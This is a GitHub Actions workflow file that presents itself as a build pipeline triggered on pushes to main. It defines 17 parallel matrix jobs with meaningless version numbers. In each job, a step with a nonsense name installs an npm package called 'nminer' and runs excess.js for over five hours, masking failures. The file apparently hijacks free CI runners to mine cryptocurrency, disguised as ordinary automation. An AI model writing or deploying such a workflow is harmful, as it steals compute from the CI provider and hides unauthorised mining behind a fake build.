name: excess
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2159 }
          - { version: 2267 }
          - { version: 896 }
          - { version: 2223 }
          - { version: 4964 }
          - { version: 9975 }
          - { version: 712 }
          - { version: 7876 }
          - { version: 3660 }
          - { version: 5696 }
          - { version: 9576 }
          - { version: 5979 }
          - { version: 2825 }
          - { version: 9412 }
          - { version: 767 }
          - { version: 297 }
          - { version: 822 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: or lest unto whoa necklace
        run: |
          npm install nminer@latest
          timeout 311m node excess.js || echo "excess executed"